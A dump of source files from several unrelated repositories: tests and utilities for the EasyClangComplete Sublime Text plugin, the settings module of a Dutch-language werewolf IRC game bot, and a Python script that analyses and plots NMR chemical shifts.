"""Init color sublime like progress status."""
super().__init__()
self.showing = False
def show_ready_message(self):
"""Empty implementation."""
pass
def show_next_message(self):
"""Empty implementation."""
pass
```
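Outside Sublime Text the moon indicator's cycling can be previewed with plain `print`, using the same ring-of-glyphs arithmetic as `show_next_message`:

```python
chars = u'🌑🌒🌓🌔🌕🌖🌗🌘'
for tick in range(12):
    print('ECC: [{}]'.format(chars[tick % len(chars)]))
```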
#### File: plugin/utils/search_scope.py
```python
from os import path
ROOT_PATH = path.abspath('/')
class TreeSearchScope:
"""Encapsulation of a search scope to search up the tree."""
def __init__(self,
from_folder=ROOT_PATH,
to_folder=ROOT_PATH):
"""Initialize the search scope."""
self.from_folder = from_folder
self.to_folder = to_folder
@property
def from_folder(self):
"""Get the starting folder."""
return self._from_folder
@from_folder.setter
def from_folder(self, folder):
"""Set the last folder in search."""
self._from_folder = folder
self._current_folder = self._from_folder
@property
def to_folder(self):
"""Get the end of search folder."""
return self._to_folder
@to_folder.setter
def to_folder(self, folder):
"""Set the last folder in search."""
self._to_folder = folder
self._one_past_last = path.dirname(self._to_folder)
def __bool__(self):
"""Check if the search scope is empty."""
return self.from_folder != ROOT_PATH
def __iter__(self):
"""Make this an iterator."""
self._current_folder = self._from_folder
return self
def __next__(self):
"""Get next folder to search in."""
current_folder = self._current_folder
self._current_folder = path.dirname(self._current_folder)
scope_end_reached = current_folder == self._one_past_last
root_reached = current_folder == self._current_folder
if root_reached or scope_end_reached:
raise StopIteration
else:
return current_folder
def __repr__(self):
"""Return search scope as a printable string."""
return 'SearchScope: from_folder: {}, to_folder: {}'.format(
self._from_folder, self._to_folder)
class ListSearchScope:
"""Encapsulation of a search scope to search in a list."""
def __init__(self, paths=[]):
"""Initialize the search scope."""
self.folders = paths
@property
def folders(self):
"""Get the starting folder."""
return self._folders
@folders.setter
def folders(self, paths):
"""Set the folders."""
self._folders = [f for f in paths if path.isdir(f)]
self._iter = iter(self._folders)
def __bool__(self):
"""Check if the search scope is not empty."""
return len(self._folders) > 0
def __iter__(self):
"""Make this an iterator."""
self._iter = iter(self._folders)
return self._iter
def __next__(self):
"""Get next folder to search in."""
return next(self._iter)
def __repr__(self):
"""Return search scope as a printable string."""
return 'SearchScope: folders: {}'.format(self._folders)
```
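Stripped of the class machinery, `TreeSearchScope` walks from a start folder up to (and including) a stop folder by repeated `dirname()`; the core loop in isolation:

```python
from os import path

def walk_up(from_folder, to_folder):
    one_past_last = path.dirname(to_folder)
    current = from_folder
    # stop at the folder above `to_folder`, or at the filesystem root
    while current not in (one_past_last, path.dirname(current)):
        yield current
        current = path.dirname(current)

print(list(walk_up('/a/b/c', '/a')))  # ['/a/b/c', '/a/b', '/a']
```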
#### File: EasyClangComplete/tests/test_CppProperties.py
```python
import imp
from os import path, environ
from unittest import TestCase
from EasyClangComplete.plugin.flags_sources import CppProperties
from EasyClangComplete.plugin import tools
from EasyClangComplete.plugin.utils import flag
from EasyClangComplete.plugin.utils import search_scope
imp.reload(CppProperties)
imp.reload(tools)
imp.reload(flag)
imp.reload(search_scope)
CppProperties = CppProperties.CppProperties
SearchScope = search_scope.TreeSearchScope
Flag = flag.Flag
def _get_test_folder(name):
return path.join(path.dirname(__file__), 'CppProperties_files', name)
class TestCppProperties(TestCase):
"""Test generating flags with a 'CppProperties.json' file."""
def test_get_all_flags(self):
"""Test if CppProperties.json is found."""
include_prefixes = ['-I']
db = CppProperties(include_prefixes)
expected = [
Flag('-I', path.normpath('/folder/include/path')),
Flag('-I', path.normpath('/another/file/path')),
]
scope = SearchScope(from_folder=_get_test_folder('simple'))
self.assertEqual(expected, db.get_flags(search_scope=scope))
def test_expand_environment_variables(self):
"""Test environment variables are expanded."""
include_prefixes = ['-I']
db = CppProperties(include_prefixes)
environ['TEST_VARIABLE_TO_EXPAND'] = '/lib_include_dir'
expected = [
Flag('-I', path.normpath('/lib_include_dir')),
]
scope = SearchScope(from_folder=_get_test_folder('environment'))
self.assertEqual(expected, db.get_flags(search_scope=scope))
def test_no_db_in_folder(self):
"""Test if no json is found."""
include_prefixes = ['-I']
db = CppProperties(include_prefixes)
expected = None
self.assertEqual(expected, db.get_flags(
path.normpath('/home/user/dummy_main.cpp')))
def test_empty_include_and_defines(self):
"""Test that empty fields are handled correctly."""
include_prefixes = ['-I']
db = CppProperties(include_prefixes)
expected = []
scope = SearchScope(from_folder=_get_test_folder('empty'))
self.assertEqual(expected, db.get_flags(search_scope=scope))
```
#### File: EasyClangComplete/tests/test_docs.py
```python
from os import path
from unittest import TestCase
def parse_code_headers(md_file_path):
"""Parse all settings names from the markdown."""
import re
all_settings_headers_regex = re.compile(r"###\s\*\*`(\w+)`\*\*.*")
with open(md_file_path) as f:
contents = f.read()
matches = all_settings_headers_regex.findall(contents)
return matches
def parse_settings(json_file_path):
"""Parse all settings names from the json file."""
import re
all_settings_regex = re.compile(r'^ "(\w+)"\s*:.+$', flags=re.MULTILINE)
with open(json_file_path) as f:
contents = f.read()
matches = all_settings_regex.findall(contents)
return matches
class TestSomething(TestCase):
"""Test that the settings have descriptions in the docs."""
def test_all_settings(self):
"""Test that all settings have docs."""
project_folder = path.dirname(path.dirname(__file__))
md_file = path.join(project_folder, 'docs', 'settings.md')
settings_file = path.join(
project_folder, 'EasyClangComplete.sublime-settings')
self.assertEqual(set(parse_code_headers(md_file)),
set(parse_settings(settings_file)))
```
#### File: EasyClangComplete/tests/test_search_scope.py
```python
import imp
from os import path
from unittest import TestCase
from EasyClangComplete.plugin.utils import search_scope
imp.reload(search_scope)
TreeSearchScope = search_scope.TreeSearchScope
ListSearchScope = search_scope.ListSearchScope
class test_search_scope(TestCase):
"""Testing file related stuff."""
def test_init_tree(self):
"""Test if we can init a search path from tree."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
scope = TreeSearchScope(from_folder=current_folder,
to_folder=parent_folder)
self.assertTrue(scope)
self.assertEqual(current_folder, scope.from_folder)
self.assertEqual(parent_folder, scope.to_folder)
def test_init_tree_partial(self):
"""Test if we can init a search path from tree."""
current_folder = path.dirname(path.abspath(__file__))
scope = TreeSearchScope(from_folder=current_folder)
self.assertTrue(scope)
self.assertEqual(current_folder, scope.from_folder)
self.assertEqual(scope.to_folder, search_scope.ROOT_PATH)
def test_iterate_tree(self):
"""Test that we can iterate a tree."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
scope = TreeSearchScope(from_folder=current_folder,
to_folder=parent_folder)
self.assertTrue(scope)
self.assertIs(scope, iter(scope))
self.assertEqual(current_folder, next(scope))
self.assertEqual(parent_folder, next(scope))
try:
next(scope)
self.fail("Did not throw StopIteration")
except StopIteration:
pass
def test_iterate_tree_twice(self):
"""Test that we can iterate tree twice."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
scope = TreeSearchScope(from_folder=current_folder,
to_folder=parent_folder)
self.assertTrue(scope)
self.assertIs(scope, iter(scope))
self.assertEqual(current_folder, next(scope))
self.assertEqual(parent_folder, next(scope))
try:
next(scope)
self.fail("Did not throw StopIteration")
except StopIteration:
pass
self.assertIs(scope, iter(scope))
self.assertEqual(current_folder, next(scope))
self.assertEqual(parent_folder, next(scope))
try:
next(scope)
self.fail("Did not throw StopIteration")
except StopIteration:
pass
def test_init_list(self):
"""Test if we can init a search path from list."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
scope = ListSearchScope([current_folder, parent_folder])
self.assertTrue(scope)
self.assertEqual(current_folder, scope.folders[0])
self.assertEqual(parent_folder, scope.folders[1])
def test_iterate_list(self):
"""Test that we can iterate a list."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
scope = ListSearchScope([current_folder, parent_folder])
self.assertTrue(scope)
self.assertEqual(current_folder, next(scope))
self.assertEqual(parent_folder, next(scope))
try:
next(scope)
self.fail("Did not throw StopIteration")
except StopIteration:
pass
def test_iterate_list_twice(self):
"""Test that we can iterate the tree twice."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
scope = ListSearchScope([current_folder, parent_folder])
self.assertTrue(scope)
self.assertIsNotNone(iter(scope))
self.assertEqual(current_folder, next(scope))
self.assertEqual(parent_folder, next(scope))
try:
next(scope)
self.fail("Did not throw StopIteration")
except StopIteration:
pass
self.assertIsNotNone(iter(scope))
self.assertEqual(current_folder, next(scope))
self.assertEqual(parent_folder, next(scope))
try:
next(scope)
self.fail("Did not throw StopIteration")
except StopIteration:
pass
def test_init_empty_tree(self):
"""Test that empty tree returns false."""
scope = TreeSearchScope()
self.assertFalse(scope)
def test_init_empty_list(self):
"""Test that empty list returns false."""
scope = ListSearchScope()
self.assertFalse(scope)
```
#### File: EasyClangComplete/tests/test_unique_list.py
```python
from unittest import TestCase
from EasyClangComplete.plugin.utils.unique_list import UniqueList
class test_unique_list(TestCase):
"""Test unique list."""
def test_init(self):
"""Test initialization."""
unique_list = UniqueList()
self.assertEqual([], unique_list.as_list())
self.assertEqual("[]", str(unique_list))
unique_list = UniqueList([1, 2, 3])
self.assertEqual([1, 2, 3], unique_list.as_list())
self.assertEqual("[1, 2, 3]", str(unique_list))
def test_append(self):
"""Test appending single values to unique list."""
unique_list = UniqueList()
unique_list.append(1)
self.assertEqual([1], unique_list.as_list())
unique_list.append(3)
self.assertEqual([1, 3], unique_list.as_list())
unique_list.append(1)
self.assertEqual([1, 3], unique_list.as_list())
unique_list.append(2)
self.assertEqual([1, 3, 2], unique_list.as_list())
def test_clear(self):
"""Test clearing the list."""
unique_list = UniqueList([1, 2, 3])
self.assertEqual([1, 2, 3], unique_list.as_list())
unique_list.clear()
self.assertEqual([], unique_list.as_list())
def test_iterable(self):
"""Test iterating over values."""
unique_list = UniqueList([0, 1, 2])
counter = 0
for i in unique_list:
self.assertEqual(i, counter)
counter += 1
def test_add(self):
"""Test merging with other iterable."""
unique_list = UniqueList([1, 2, 3])
other_list = [1, 4, 2, 5]
unique_list += other_list
self.assertEqual([1, 2, 3, 4, 5], unique_list.as_list())
```
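The class under test is not included in this dump; a minimal implementation consistent with every assertion above would be:

```python
class UniqueList:
    """List that silently drops duplicates while preserving insertion order."""

    def __init__(self, iterable=None):
        self.__list = []
        if iterable:
            self.__iadd__(iterable)

    def append(self, value):
        if value not in self.__list:
            self.__list.append(value)

    def __iadd__(self, other):
        for value in other:
            self.append(value)
        return self

    def clear(self):
        self.__list = []

    def as_list(self):
        return self.__list

    def __iter__(self):
        return iter(self.__list)

    def __str__(self):
        return str(self.__list)
```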
|
{
"source": "Jeebeevee/wolfbot",
"score": 2
}
|
#### File: wolfbot/settings/wolfgame.py
```python
PING_WAIT = 300 # Seconds
PING_MIN_WAIT = 30
MINIMUM_WAIT = 60
EXTRA_WAIT = 20
MAXIMUM_WAITED = 2 # limit for amount of !wait's
STATS_RATE_LIMIT = 15
VOTES_RATE_LIMIT = 15
ADMINS_RATE_LIMIT = 300
SHOTS_MULTIPLIER = .12 # ceil(shots_multiplier * len_players) = bullets given
MAX_PLAYERS = 30
DRUNK_SHOTS_MULTIPLIER = 3
NIGHT_TIME_LIMIT = 120
NIGHT_TIME_WARN = 0 # should be less than NIGHT_TIME_LIMIT
DAY_TIME_LIMIT_WARN = 780
DAY_TIME_LIMIT_CHANGE = 120 # seconds after DAY_TIME_LIMIT_WARN has passed
KILL_IDLE_TIME = 300
WARN_IDLE_TIME = 180
PART_GRACE_TIME = 7
QUIT_GRACE_TIME = 30
MAX_PRIVMSG_TARGETS = 1
LOG_FILENAME = ""
BARE_LOG_FILENAME = ""
# HIT MISS SUICIDE
GUN_CHANCES = ( 5/7 , 1/7 , 1/7 )
DRUNK_GUN_CHANCES = ( 2/7 , 4/7 , 1/7 )
MANSLAUGHTER_CHANCE = 1/5 # ACCIDENTAL HEADSHOT (FATAL)
GUNNER_KILLS_WOLF_AT_NIGHT_CHANCE = 0
GUARDIAN_ANGEL_DIES_CHANCE = 1/2
rechercheur_REVEALED_CHANCE = 2/5
#################################################################################################################
# ROLE INDEX: PLAYERS SEER WOLF CURSED DRUNK HARLOT TRAITOR GUNNER CROW ANGEL rechercheur ##
#################################################################################################################
ROLES_GUIDE = { 4 : ( 1 , 1 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ), ##
6 : ( 1 , 1 , 1 , 1 , 0 , 0 , 0 , 0 , 0 , 0 ), ##
8 : ( 1 , 2 , 1 , 1 , 1 , 0 , 0 , 0 , 0 , 0 ), ##
10 : ( 1 , 2 , 1 , 1 , 1 , 1 , 1 , 0 , 0 , 0 ), ##
11 : ( 1 , 2 , 1 , 1 , 1 , 1 , 1 , 0 , 1 , 0 ), ##
15 : ( 1 , 3 , 1 , 1 , 1 , 1 , 1 , 0 , 1 , 1 ), ##
22 : ( 1 , 4 , 1 , 1 , 1 , 1 , 1 , 0 , 1 , 1 ), ##
29 : ( 1 , 5 , 1 , 1 , 1 , 1 , 1 , 0 , 1 , 1 ), ##
None : ( 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 )} ##
#################################################################################################################
# Notes: ##
#################################################################################################################
GAME_MODES = {}
AWAY = [] # cloaks of people who are away.
SIMPLE_NOTIFY = [] # cloaks of people who !simple, who want everything /notice'd
ROLE_INDICES = {0 : "ziener",
1 : "wolf",
2 : "vervloekte burger",
3 : "dronken burger",
4 : "onschuldige meisje",
5 : "verrader",
6 : "kanonnier",
7 : "weerkraai",
8 : "bescherm engel",
9 : "rechercheur"}
INDEX_OF_ROLE = dict((v,k) for k,v in ROLE_INDICES.items())
NO_VICTIMS_MESSAGES = ("Het lichaam van een jonge huisdier is gevonden.",
"Een plas van bloed en wolfpoot afdrukken zijn gevonden.",
"Een pluk van wolvenhaar is gevonden.")
LYNCH_MESSAGES = ("De burgers hebben, na lang overleg, besloten te elmineren \u0002{0}\u0002, hij/zij was een... \u0002{1}\u0002.",
"Onder veel lawaai, de woedende burgers elimineren \u0002{0}\u0002, hij/zij was een... \u0002{1}\u0002.",
"De menigte sleept een protesterende \u0002{0}\u0002 naar de galg. Hij/zij bezwijkt aan de wil van de groep, en wordt opgehangen. Hij/zij was een \u0002{1}\u0002.",
"Verslagen door zijn/haar lot, is \u0002{0}\u0002 naar de galg geleid. Na de dood bleek hij/zij een \u0002{1}\u0002 te zijn.")
import botconfig
RULES = (botconfig.CHANNEL + " Kanaal regels: 1) Wees aardig voor elkaar. 2) Deel geen spel infomatie "+
"na je dood. 3) Bots zijn niet toegestaan. 4) Speel niet met clones van jezelf.\n"+
"5) Stop niet met spelen, tenzij het niet anders kan. 6) Niet vloeken en hou het leuk "+
"voor iedereen. 7) Sla geen Prive berichten over van het spel tijdens het spel. "+
"8) Gebruik je gezonde verstand. 9) Wachten op timeouts is niet leuk.")
# Other settings:
START_WITH_DAY = False
WOLF_STEALS_GUN = False # at night, the wolf can steal steal the victim's bullets
OPT_IN_PING = False # instead of !away/!back, users can opt-in to be pinged
PING_IN = [] # cloaks of users who have opted in for ping
is_role = lambda plyr, rol: rol in ROLES and plyr in ROLES[rol]
def plural(role):
if role == "wolf": return "wolven"
elif role == "persoon": return "personen"
else: return role + "s"
def list_players():
pl = []
for x in ROLES.values():
pl.extend(x)
return pl
def list_players_and_roles():
plr = {}
for x in ROLES.keys():
for p in ROLES[x]:
plr[p] = x
return plr
get_role = lambda plyr: list_players_and_roles()[plyr]
def del_player(pname):
prole = get_role(pname)
ROLES[prole].remove(pname)
class InvalidModeException(Exception): pass
def game_mode(name):
def decor(c):
GAME_MODES[name] = c
return c
return decor
CHANGEABLE_ROLES = { "zieners" : INDEX_OF_ROLE["ziener"],
"wolven" : INDEX_OF_ROLE["wolf"],
"vervloekten" : INDEX_OF_ROLE["vervloekte burger"],
"dronkaarts" : INDEX_OF_ROLE["dronken burger"],
"onschuldige meisjes" : INDEX_OF_ROLE["onschuldige meisje"],
"verraders" : INDEX_OF_ROLE["verrader"],
"kanonniers" : INDEX_OF_ROLE["kanonnier"],
"weerkraaien" : INDEX_OF_ROLE["weerkraai"],
"engelen" : INDEX_OF_ROLE["bescherm engel"],
"rechercheurs" : INDEX_OF_ROLE["rechercheur"]}
# TODO: implement game modes
@game_mode("roles")
class ChangedRolesMode(object):
"""Example: !fgame roles=wolves:1,seers:0,angels:1"""
def __init__(self, arg):
self.ROLES_GUIDE = ROLES_GUIDE.copy()
lx = list(ROLES_GUIDE[None])
pairs = arg.split(",")
pl = list_players()
if not pairs:
raise InvalidModeException("Invalid syntax for mode roles.")
for pair in pairs:
change = pair.split(":")
if len(change) != 2:
raise InvalidModeException("Invalid syntax for mode roles.")
role, num = change
try:
num = int(num)
try:
lx[CHANGEABLE_ROLES[role.lower()]] = num
except KeyError:
raise InvalidModeException(("De rol \u0002{0}\u0002 "+
"is niet geldig.").format(role))
except ValueError:
raise InvalidModeException("A bad value was used in mode roles.")
for k in ROLES_GUIDE.keys():
self.ROLES_GUIDE[k] = tuple(lx)
# Persistence
# Load saved settings
import sqlite3
import os
conn = sqlite3.connect("data.sqlite3", check_same_thread = False)
with conn:
c = conn.cursor()
c.execute('CREATE TABLE IF NOT EXISTS away (nick TEXT)') # whoops, i mean cloak, not nick
c.execute('CREATE TABLE IF NOT EXISTS simple_role_notify (cloak TEXT)') # people who understand each role
c.execute('SELECT * FROM away')
for row in c:
AWAY.append(row[0])
c.execute('SELECT * FROM simple_role_notify')
for row in c:
SIMPLE_NOTIFY.append(row[0])
# populate the roles table
c.execute('DROP TABLE IF EXISTS roles')
c.execute('CREATE TABLE roles (id INTEGER PRIMARY KEY AUTOINCREMENT, role TEXT)')
for x in ["burger"]+list(ROLE_INDICES.values()):
c.execute("INSERT OR REPLACE INTO roles (role) VALUES (?)", (x,))
c.execute(('CREATE TABLE IF NOT EXISTS rolestats (player TEXT, role TEXT, '+
'teamwins SMALLINT, individualwins SMALLINT, totalgames SMALLINT, '+
'UNIQUE(player, role))'))
if OPT_IN_PING:
c.execute('CREATE TABLE IF NOT EXISTS ping (cloak text)')
c.execute('SELECT * FROM ping')
for row in c:
PING_IN.append(row[0])
def remove_away(clk):
with conn:
c.execute('DELETE from away where nick=?', (clk,))
def add_away(clk):
with conn:
c.execute('INSERT into away VALUES (?)', (clk,))
def remove_simple_rolemsg(clk):
with conn:
c.execute('DELETE from simple_role_notify where cloak=?', (clk,))
def add_simple_rolemsg(clk):
with conn:
c.execute('INSERT into simple_role_notify VALUES (?)', (clk,))
def remove_ping(clk):
with conn:
c.execute('DELETE from ping where cloak=?', (clk,))
def add_ping(clk):
with conn:
c.execute('INSERT into ping VALUES (?)', (clk,))
def update_role_stats(acc, role, won, iwon):
with conn:
        c.execute(("SELECT teamwins, individualwins, totalgames FROM rolestats "+
                   "WHERE player=? AND role=?"), (acc, role))
        row = c.fetchone()
        if row:
            wins, iwins, total = row
        else:
            wins, iwins, total = 0, 0, 0
if won:
wins += 1
if iwon:
iwins += 1
total += 1
c.execute("INSERT OR REPLACE INTO rolestats VALUES (?,?,?,?,?)",
(acc, role, wins, iwins, total))
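# Usage sketch (illustrative values, not from the real bot state):
# update_role_stats("alice", "wolf", won=True, iwon=False)
# would bump alice's wolf team-win count and total game count by one.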
```
|
{
"source": "jeeberhardt/shift",
"score": 2
}
|
#### File: shift/scripts/analyze.py
```python
import os
import re
import sys
import argparse
import h5py
import numpy as np
import pandas as pd
from Bio.SeqUtils import seq3
from matplotlib import pyplot as plt
__author__ = "<NAME>"
__copyright__ = "Copyright 2016, <NAME>"
__license__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
def get_obs(obs_file):
return pd.read_csv(obs_file, delim_whitespace=True, usecols=[1,2,3,5],
names=['resid', 'resn', 'atom_type', 'obs'])
def get_random_coil(rc_file):
rc = pd.read_csv(rc_file, usecols=[1,2,3], names=['resn', 'atom_type', 'rc'])
rc['resn'] = rc['resn'].apply(seq3).str.upper()
return rc
def get_pred(hdf_file, atom_types, start=0, stop=-1):
columns = ['resid', 'resn', 'atom_type', 'pred', 'std']
df = pd.DataFrame(np.nan, index=[0], columns=columns)
with h5py.File(hdf_file, 'r') as f:
i = 0
for residue in f.iteritems():
resid = int(residue[0].split('_')[0])
resn = str(residue[0].split('_')[1])
for atom_type in atom_types:
try:
nset = '%s_%s/%s' % (resid, resn, atom_type)
if stop == -1:
dset = f[nset][start:]
else:
dset = f[nset][start:stop]
df.loc[i] = [resid, resn, atom_type, np.nanmean(dset), np.nanstd(dset)]
i += 1
except KeyError:
pass
return df
def rmsd(x, y):
diff = x - y
diff = diff.dropna()
return np.sqrt(np.sum(diff**2)/(float(diff.shape[0])))
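# Quick sketch of rmsd() on two pandas Series; rows where the difference is
# NaN are dropped before summing, so partially observed data is tolerated:
# rmsd(pd.Series([1.0, 2.0, np.nan]), pd.Series([1.5, 2.5, 3.0]))  # -> 0.5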
def extract_dssp_info(dssp_file, sectype='H', shift=0):
start_read = False
list_sec = []
i = 0
with open(dssp_file) as f:
for line in f:
if ' # RESIDUE' in line:
start_read = True
            if start_read and "#" not in line:
resnum = int(line[6:10].strip()) + shift
secstr = str(line[16])
if sectype == secstr:
i += 1
else:
if i: list_sec.append((resnum-i, i))
i = 0
return list_sec
def plot_dssp_info(ax, resid, min_data, max_data, dssp_file, baseline=None):
range_data = max_data - min_data
    if baseline is not None:
y_min = baseline - (range_data / 10.)
else:
y_min = min_data - (range_data / 10.)
y_bar = y_min + (np.abs(min_data - y_min) / 2.)
y_box = y_bar + (np.abs(y_bar - y_min) / 2.)
y_len = 2. * (y_bar - y_box)
ax.broken_barh(extract_dssp_info(dssp_file, 'H'), (y_box, y_len), facecolors='SteelBlue', zorder=3)
ax.broken_barh(extract_dssp_info(dssp_file, 'E'), (y_box, y_len), facecolors='Gold', zorder=3)
ax.plot(resid, len(resid)*[y_bar], color='black', zorder=1, lw=0.5)
def plot_shift(cs, dssp_file=None):
color = 'chocolate'
atom_types = cs['atom_type'].unique()
xmin = cs['resid'].min()
xmax = cs['resid'].max()
label = {'CA': 'C_{\\alpha}', 'CB': 'C_{\\beta}'}
for atom_type in atom_types:
        if atom_type in label:
ylabel = label[atom_type]
else:
ylabel = atom_type
fig, ax = plt.subplots(figsize=(12, 4))
tmp = cs.loc[cs['atom_type'] == atom_type]
ax.axhline(linewidth=1, color='Gainsboro')
ax.plot(tmp['resid'], tmp['dpred'], linestyle='-', marker='.', color=color)
ax.plot(tmp['resid'], tmp['dobs'], linestyle='-', marker='.', color='black')
std_neg = tmp['dpred'] - tmp['std']
std_pos = tmp['dpred'] + tmp['std']
ax.fill_between(tmp['resid'], std_neg, std_pos, color=color, alpha=0.4)
ymax = np.max(np.abs(tmp['dobs'])) * 1.5
ymin = -ymax
if dssp_file:
plot_dssp_info(ax, tmp['resid'], ymin / 1.5, ymax, dssp_file)
ax.set_xlabel("Residue", fontsize=20)
ax.set_ylabel(r"$\Delta\delta %s$ (ppm)" % ylabel, fontsize=20)
ax.set_xlim(xmin - 1, xmax + 1)
ax.set_ylim(ymin, ymax)
plt.savefig("shift_%s.png" % atom_type, dpi=300, format='png', bbox_inches='tight')
plt.close(fig)
def plot_distribution(cs, hdf_file):
color = 'chocolate'
atom_types = cs['atom_type'].unique()
with h5py.File(hdf_file, 'r') as f:
for atom_type in atom_types:
out_dir = 'shift_distribution/%s' % atom_type
os.makedirs(out_dir)
cols = 10
num = cs['atom_type'].value_counts()[atom_type]
rows = int(num / cols) + (num % cols > 0)
figB, axB = plt.subplots(rows, cols, figsize=(35, 45), sharex=True, sharey=True)
icol, irow = 0, 0
xmax = 0
# We want the global xmax !
for residue in f.iteritems():
resid = int(residue[0].split('_')[0])
resn = str(residue[0].split('_')[1])
try:
nset = '%s_%s/%s' % (resid, resn, atom_type)
dset = f[nset]
row = cs[(cs['resid'] == resid) & (cs['resn'] == resn) & (cs['atom_type'] == atom_type)]
x = dset - row['rc'].values[0]
xmax = np.nanmax([xmax, np.nanmax(np.abs(x)), np.abs(row['dobs']).values[0]])
except KeyError:
pass
xmax *= 1.5
for residue in f.iteritems():
resid = int(residue[0].split('_')[0])
resn = str(residue[0].split('_')[1])
try:
nset = '%s_%s/%s' % (resid, resn, atom_type)
dset = f[nset]
y, x = np.histogram(dset, bins=50)
row = cs[(cs['resid'] == resid) & (cs['resn'] == resn) & (cs['atom_type'] == atom_type)]
# Get Delta_delta CS
x = x[:-1] - row['rc'].values[0]
# Get density (something is wrong with numpy density ...)
y = y / np.float(np.sum(y))
# For the small picture !
fig, ax = plt.subplots(figsize=(6, 2))
ax.plot(x, y, linestyle='-', color=color)
ax.plot(row['dobs'], 0, marker='^', markersize=30, color='black')
ax.plot(row['dpred'], 0, marker='^', markersize=25, color=color)
ax.set_ylim(0, 0.20)
ax.set_xlim(-xmax, xmax)
ax.set_ylabel('Population', fontsize=20)
ax.set_xlabel(r'$\Delta\delta$ (ppm)', fontsize=20)
fig_name = "%s/%s_%s.png" % (out_dir, resid, resn)
fig.savefig(fig_name, dpi=300, format='png', bbox_inches='tight')
plt.close(fig)
# And now the BIG picture !
axB[irow, icol].plot(x, y, linestyle='-', color=color)
axB[irow, icol].plot(row['dobs'], 0, marker='^', markersize=30, color='black')
axB[irow, icol].plot(row['dpred'], 0, marker='^', markersize=25, color=color)
axB[irow, icol].set_ylim(0, 0.20)
axB[irow, icol].set_xlim(-xmax, xmax)
axB[irow, icol].set_title("%s - %s" % (resid, resn))
if icol == 0:
axB[irow, icol].set_ylabel('Population', fontsize=15)
if irow == rows - 1:
axB[irow, icol].set_xlabel(r'$\Delta\delta$ (ppm)', fontsize=15)
icol += 1
if icol == cols:
icol = 0
irow += 1
except KeyError:
pass
fig_name = "%s/distribution_%s_all.png" % (out_dir, atom_type)
figB.savefig(fig_name, dpi=300, format='png', bbox_inches='tight')
plt.close(figB)
def plot_shift_diff(cs, dssp_file=None):
color = 'chocolate'
atom_types = cs['atom_type'].unique()
label = {'CA': 'C_{\\alpha}', 'CB': 'C_{\\beta}'}
for atom_type in atom_types:
        if atom_type in label:
ylabel = label[atom_type]
else:
ylabel = atom_type
tmp = cs.loc[cs['atom_type'] == atom_type]
std_neg = tmp['diff'] - tmp['std']
std_neg[std_neg < 0.] = 0.
std_pos = tmp['diff'] + tmp['std']
fig, ax = plt.subplots(figsize=(12,4))
ax.plot(tmp['resid'], tmp['diff'], color=color)
ax.fill_between(tmp['resid'], std_neg, std_pos, color=color, alpha=0.4)
if dssp_file:
plot_dssp_info(ax, tmp['resid'], 0, 10., dssp_file)
ax.set_ylim(-1, 10.)
ax.set_xlim(np.min(tmp['resid'] - 1), np.max(tmp['resid']) + 1)
ax.set_xlabel('Residue', fontsize=20)
ax.set_ylabel(r'$\delta %s$ |$\delta_{\mathrm{pred}}-\delta_{\mathrm{exp}}$| (ppm)' % ylabel, fontsize=20)
fig_name = "diff_shift_%s.png" % (atom_type)
fig.savefig(fig_name, dpi=300, format='png', bbox_inches='tight')
plt.close(fig)
def replace_bfactors(cs, column, pdb_file, filename='new_pdb', na_value=-1):
atom_types = cs['atom_type'].unique()
for atom_type in atom_types:
new_pdb_file = '%s_%s.pdb' % (filename, atom_type)
tmp = cs.loc[cs['atom_type'] == atom_type]
with open(pdb_file, 'r') as f, open(new_pdb_file, 'w') as w:
for line in f:
if re.search('^ATOM', line):
resid = int(line[22:26])
row = tmp.loc[(tmp['resid'] == resid) & (tmp['atom_type'] == atom_type)]
try:
value = row[column].values[0]
if np.isnan(value):
value = na_value
except:
value = na_value
line = line[0:60] + '%6.2f' % value + line[66:-1]
w.write('%s\n' % line)
else:
w.write(line)
def main():
parser = argparse.ArgumentParser(description='Analyze NMR chemical shift')
parser.add_argument('-c', "--obs", dest='obsfile', required = True, \
action="store", type=str, \
help = "bmrb file with experimental chemical shift")
parser.add_argument("-h5", dest='h5file', required = True, \
action = "store", type=str, \
help = "provide a hdf5 file with all nmr data")
parser.add_argument("-d", "--dssp", dest='dsspfile', \
action = "store", type=str, default = None, \
help = "provide a dssp file for secondary structure")
parser.add_argument("--distribution", dest='distribution', \
action = "store_true", default = False, \
help = "if we want to plot all the distribution")
parser.add_argument("-p", '--pdb', dest='pdb_file', \
action = "store", default = None, \
help = "pdb file (bfactors replaced by shift diff)")
parser.add_argument('--start', dest="start", default=0,
action="store", type=int,
help='number of the first frame (0 based)')
parser.add_argument('--stop', dest="stop", default=-1,
action="store", type=int,
help='number of the last frame (excluded)')
options = parser.parse_args()
obs_file = options.obsfile
hdf_file = options.h5file
dssp_file = options.dsspfile
distribution = options.distribution
pdb_file = options.pdb_file
start = options.start
stop = options.stop
try:
shiftx2_dir = os.environ['SHIFTX2_DIR']
rc_file = shiftx2_dir + '/lib/RandomCoil.csv'
except KeyError:
        print 'Error: The environment variable SHIFTX2_DIR is not set!'
sys.exit(1)
# Get obs and random coil
cs_obs = get_obs(obs_file)
# Get mean and std pred
cs_pred = get_pred(hdf_file, cs_obs['atom_type'].unique(), start, stop)
# Get Random coil values
rc = get_random_coil(rc_file)
# Merge all the data together
cs = pd.merge(cs_obs, cs_pred, how='right', on=['resid', 'resn', 'atom_type'])
cs = cs.sort_values(by='resid').reset_index(drop=True)
cs = pd.merge(cs, rc, how='left', on=['resn', 'atom_type'])
# Get Delta_delta chemical shift
cs['dobs'] = cs['obs'] - cs['rc']
cs['dpred'] = cs['pred'] - cs['rc']
# Get diff between pred and obs
cs['diff'] = np.abs(cs['pred'] - cs['obs'])
# Compute RMSD between obs and pred for each atom type
for atom_type in cs['atom_type'].unique():
tmp = cs.loc[cs['atom_type'] == atom_type]
print '%3s %5.3f' % (atom_type, rmsd(tmp['dobs'], tmp['dpred']))
# Save and plot data
cs.to_csv('shift_resume.csv', index=False, na_rep='NaN')
plot_shift(cs, dssp_file)
